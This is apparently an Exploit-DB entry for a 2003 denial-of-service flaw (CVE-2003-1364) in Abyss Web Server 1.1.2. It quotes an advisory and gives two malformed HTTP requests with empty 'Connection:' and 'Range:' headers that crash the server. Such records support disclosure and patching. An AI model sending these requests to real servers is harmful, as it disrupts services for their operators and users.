Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service Vulnerability

2003-04-05T00:00:00
ID EDB-ID:22460
Type exploitdb
Reporter Auriemma Luigi
Modified 2003-04-05T00:00:00

Description

Abyss Web Server 1.1.2 Incomplete HTTP Request Denial Of Service Vulnerability. CVE-2003-1364 . Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/7287/info

A denial of service vulnerability has been reported for Abyss Web Server. The vulnerability exists when Abyss attempts to parse certain incomplete HTTP headers. 

GET / HTTP/1.0
Connection:

GET / HTTP/1.0
Range: